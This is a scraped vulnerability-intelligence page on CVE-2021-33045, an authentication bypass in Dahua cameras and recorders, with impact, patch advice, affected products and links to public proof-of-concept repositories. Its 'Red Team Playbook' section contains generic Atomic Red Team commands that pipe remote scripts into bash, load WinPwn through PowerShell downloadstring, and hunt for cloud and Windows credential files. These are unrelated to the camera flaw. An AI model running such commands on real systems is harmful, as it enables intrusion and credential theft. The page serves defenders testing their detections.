CVE-2021-33045
Overview
This vulnerability is an authentication bypass affecting Dahua IP cameras, video intercoms, NVR, and XVR devices. The root cause lies in improper validation of identity credentials during the login process, allowing attackers to circumvent authentication by crafting malicious data packets. The flaw resides specifically in the device's login mechanism handling RPC2_Login requests.
Vulnerability Description
The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
Impact
An unauthenticated attacker can gain full administrative access to affected Dahua devices, enabling control over device functions and access to sensitive video streams and configurations. No prior credentials or user interaction are required, allowing remote compromise. This can lead to unauthorized surveillance, data exfiltration, and potential lateral movement within a network environment.
Solution
Dahua has released firmware updates addressing this authentication bypass for affected IPC and NVR product lines. Users should apply the latest firmware versions as detailed in Dahua's security advisory at https://www.dahuasecurity.com/support/cybersecurity/details/957. Specific firmware versions and update instructions are provided in the advisory to mitigate this vulnerability effectively.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The identity authentication bypass vulnerability in certain Dahua products presents a significant security concern, primarily during the login process. This flaw allows attackers to circumvent the device's identity authentication mechanisms by sending specially crafted malicious data packets. The vulnerability arises from insufficient validation of input data, which can lead to unauthorized access to the device's functionalities. This issue is particularly critical given the nature of these devices, which often serve as surveillance systems in both residential and commercial environments, making them attractive targets for malicious actors.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage network access to send malicious packets to the affected devices, effectively bypassing authentication checks. This could be executed remotely, requiring minimal technical skill, as the attacker only needs to craft the appropriate data packets. Once access is gained, the attacker could manipulate device settings, view live feeds, or even disable security features, leading to a complete compromise of the surveillance system. The ease of exploitation combined with the potential for widespread access makes this vulnerability particularly alarming for organizations relying on these devices for security.
The real-world impact of this vulnerability is profound, especially for businesses that depend on Dahua products for surveillance and security. Unauthorized access to surveillance feeds can lead to significant breaches of privacy, loss of sensitive information, and potential legal liabilities. For instance, if an attacker gains access to a corporate security system, they could monitor sensitive areas, gather intelligence for future attacks, or disrupt operations. Furthermore, the reputational damage resulting from such breaches can have long-lasting effects on customer trust and brand integrity, translating into financial losses and diminished market position.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware on affected devices is crucial, as manufacturers often release patches to address known vulnerabilities. Network segmentation can also help limit exposure by isolating surveillance systems from other critical infrastructure. Additionally, employing intrusion detection systems (IDS) can aid in identifying unauthorized access attempts or anomalous traffic patterns indicative of exploitation attempts. Organizations should also conduct regular security assessments and penetration testing to evaluate the effectiveness of their defenses and ensure compliance with best practices.
In conclusion, the identity authentication bypass vulnerability in Dahua products underscores the critical need for robust security measures in the deployment of surveillance technologies. The potential for exploitation poses significant risks to both operational integrity and organizational reputation. By adopting proactive detection and mitigation strategies, businesses can better protect their assets and maintain the trust of their stakeholders in an increasingly interconnected world.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-33045, with new exploitation attempts emerging after a period of dormancy. This resurgence is accompanied by a significant increase in the EPSS score, now approaching certainty of exploitation, indicating that threat actors are increasingly prioritizing this vulnerability. Although no confirmed ransomware groups have been linked to its exploitation yet, the elevated detection trend signals growing adversary interest and potential weaponization. The appearance of new proof-of-concept exploits on public repositories further lowers the barrier for attackers to develop functional exploits, amplifying the risk to organizations using affected Dahua IP camera firmware. Consequently, the threat level for this vulnerability has intensified, underscoring the urgency for defenders to enhance monitoring and detection capabilities around this vector.
Update 2 — July 08, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-33045, indicating increased adversary engagement with this critical authentication bypass vulnerability in Dahua IP camera firmware. This surge reflects growing exploitation attempts, likely facilitated by the availability of new proof-of-concept code on public repositories, which lowers the technical barrier for threat actors. Although ransomware groups have not yet been definitively linked to active exploitation, the intensifying telemetry trend signals a heightened risk of weaponization in broader attack campaigns. The elevated exploitability score remains stable but near maximum, underscoring persistent and serious threat potential. Collectively, these developments elevate the threat level, emphasizing that defenders must recognize this vulnerability as an increasingly attractive target within the current exploit landscape.
Update 3 — July 17, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-33045, indicating that threat actors are increasingly targeting this identity authentication bypass vulnerability in Dahua IP camera firmware. This surge in telemetry suggests a growing operational interest, potentially driven by the availability of multiple proof-of-concept exploits on public repositories, which continue to lower the technical barriers for exploitation. Although ransomware groups have not been definitively linked to active campaigns leveraging this vulnerability, the intensification of exploitation attempts elevates the likelihood of its incorporation into broader attack frameworks. The persistently high EPSS score, coupled with the sharp rise in observed activity, underscores an elevated threat level that demands heightened vigilance from defenders. This evolving landscape signals that CVE-2021-33045 remains a critical risk vector with increasing exploitation momentum, reinforcing its status as a priority vulnerability in current security postures.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dahuasecurity | Ipc-Hum7xxx Firmware | All |
cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Ipc-Hx3xxx Firmware | All |
cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Ipc-Hx5xxx Firmware | All |
cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Nvr-1xxx Firmware | All |
cpe:2.3:o:dahuasecurity:nvr-1xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Nvr-2xxx Firmware | All |
cpe:2.3:o:dahuasecurity:nvr-2xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Nvr-4xxx Firmware | All |
cpe:2.3:o:dahuasecurity:nvr-4xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Nvr-5xxx Firmware | All |
cpe:2.3:o:dahuasecurity:nvr-5xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Nvr-6xx Firmware | All |
cpe:2.3:o:dahuasecurity:nvr-6xx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Vth-542xh Firmware | All |
cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Vto-65xxx Firmware | All |
cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Vto-75x95x Firmware | All |
cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Xvr-4x04 Firmware | N/A |
cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:-:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Xvr-4x08 Firmware | All |
cpe:2.3:o:dahuasecurity:xvr-4x08_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Xvr-4x04 Firmware | All |
cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Xvr-5x04 Firmware | All |
cpe:2.3:o:dahuasecurity:xvr-5x04_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Xvr-5x08 Firmware | All |
cpe:2.3:o:dahuasecurity:xvr-5x08_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Xvr-5x16 Firmware | All |
cpe:2.3:o:dahuasecurity:xvr-5x16_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Xvr-7x16 Firmware | All |
cpe:2.3:o:dahuasecurity:xvr-7x16_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Xvr-7x32 Firmware | All |
cpe:2.3:o:dahuasecurity:xvr-7x32_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
dongpohezui/cve-2021-33045
|
dongpohezui | 9 | 2 | 2021-10-11 | View |
|
lequoca/Camera-Dahua-CVE-2021-33045
|
lequoca | 1 | 0 | 2025-12-22 | View |
Threat Feed
14 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-33045 |
| dahuasecurity.com |
GitHub CVE
x_refsource_MISC
|
https://www.dahuasecurity.com/support/cybersecurity/details/957 |
| seclists.org |
GitHub CVE
mailing-list
x_refsource_FULLDISC
|
http://seclists.org/fulldisclosure/2021/Oct/13 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-33045 |